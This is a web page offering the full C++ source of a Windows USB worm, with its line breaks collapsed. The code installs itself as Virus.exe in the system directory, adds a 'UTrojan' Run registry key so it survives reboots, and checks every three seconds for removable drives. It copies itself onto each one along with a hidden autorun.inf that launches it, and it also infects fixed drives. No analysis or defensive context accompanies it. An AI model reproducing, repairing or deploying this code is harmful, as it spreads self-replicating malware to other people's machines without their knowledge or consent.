C++ U盘感染程序源码


C++ U盘感染程序源码

print?#include "stdafx.h"#include <stdio .h>#include <windows .h>HANDLE hMutex;//信号量句柄DWORD WINAPI infect(LPVOID lpParam);//感染void Install(void); //安装void InfectOtherDisk();//感染其它盘char ExeFile[MAX_PATH];//==========================================================================void Install(void){char FilePath[255]={0};char Explorer[12]="explorer ";HKEY AutoStart;STARTUPINFO si;PROCESS_INFORMATION pi;ZeroMemory( &si, sizeof(si) );si.cb = sizeof(si);ZeroMemory( &pi, sizeof(pi) );if(GetSystemDirectory(FilePath,254) == 0){return;}strcat(FilePath, "\\Virus.exe");CopyFile(ExeFile, FilePath, true);RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0, KEY_ALL_ACCESS, &AutoStart);RegSetValueEx(AutoStart, // subkey handle"UTrojan", // value name0, // must be zeroREG_SZ, // value type(LPBYTE) FilePath, // pointer to value datastrlen(FilePath) + 1); // length of value dataRegCloseKey(AutoStart);strcpy(FilePath,ExeFile); //now use FilePath[] as tempFilePath[3]='\0';strcat(Explorer,FilePath);CreateProcess( NULL, //open the directory of U-stick as usualExplorer,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi );return;}//==========================================================================DWORD WINAPI infect(LPVOID lpParam){char Drives[255];int DriveType;char *pDrive=0;char FilePath[25];FILE *AutoRun;while(true){memset(Drives,0,255);memset(FilePath,0,25);pDrive=Drives;DriveType=0;AutoRun=NULL;GetLogicalDriveStrings(254,Drives);while(pDrive[0]!=NULL){DriveType=GetDriveType(pDrive);if(DriveType!=DRIVE_REMOVABLE){pDrive+=4;continue;}strcpy(FilePath,pDrive);strcat(FilePath,"Virus.exe");SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);DeleteFile(FilePath);CopyFile(ExeFile, 
FilePath,false);SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);strcpy(FilePath,pDrive);strcat(FilePath,"autorun.inf");SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);DeleteFile(FilePath);AutoRun=fopen(FilePath,"w+");if(AutoRun!=NULL){fputs("[AutoRun]\n",AutoRun);fputs("open=Virus.exe\n",AutoRun);fputs("shellexecute=Virus.exe\n",AutoRun);fputs("shell\\Auto\\command=Virus.exe",AutoRun);}fclose(AutoRun);SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);pDrive+=4;}Sleep(3000); //every 3sec to detect whether a U-stick exits}return 0;}//==========================================================================void InfectOtherDisk(void){char Drives[255];int DriveType;char *pDrive=0;char AppFilePath[25];char InfFilePath[25];memset(Drives,0,255);memset(AppFilePath,0,25);memset(InfFilePath,0,25);pDrive=Drives;DriveType=0;GetLogicalDriveStrings(254,Drives);while(pDrive[0]!=NULL){DriveType=GetDriveType(pDrive);if(DriveType==DRIVE_FIXED){strcpy(AppFilePath,pDrive);strcpy(InfFilePath,pDrive);strcat(AppFilePath,"Virus.exe");strcat(InfFilePath,"autorun.inf");CopyFile(ExeFile,AppFilePath, true);SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);CopyFile("autorun.inf",InfFilePath,true);SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);pDrive+=4;}else{break;}}}//==========================================================================int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow){// TOD Place code here.int DriveType;GetModuleFileName(NULL,ExeFile,MAX_PATH);//得到此程序的路径if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL){return 0;}DriveType=GetDriveType(NULL);if(DriveType==DRIVE_REMOVABLE){Install();InfectOtherDisk();ReleaseMutex(hMutex);return 0;}else if (DriveType==DRIVE_FIXED){InfectOtherDisk();CreateThread(NULL,NULL,infect,NULL,NULL,NULL);return 
0;}else{return 0;}}</windows></stdio>